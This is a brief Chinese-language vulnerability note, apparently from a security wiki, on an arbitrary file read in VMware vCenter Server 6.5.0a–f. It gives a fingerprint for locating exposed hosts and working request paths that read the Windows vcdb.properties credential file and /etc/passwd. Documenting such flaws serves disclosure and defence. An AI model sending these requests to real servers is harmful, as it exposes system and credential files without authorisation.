跳转至

VMware vCenter vid 任意文件读取漏洞

漏洞描述

VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件、

漏洞影响

VMware vCenter Server 6.5.0a- f 版本

网络测绘

title="ID_VC_Welcome"

漏洞复现

登录页面

image-20220311164942992

Windows主机

/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

Linux主机

/eam/vib?id=/etc/passwd

image-20220311164928273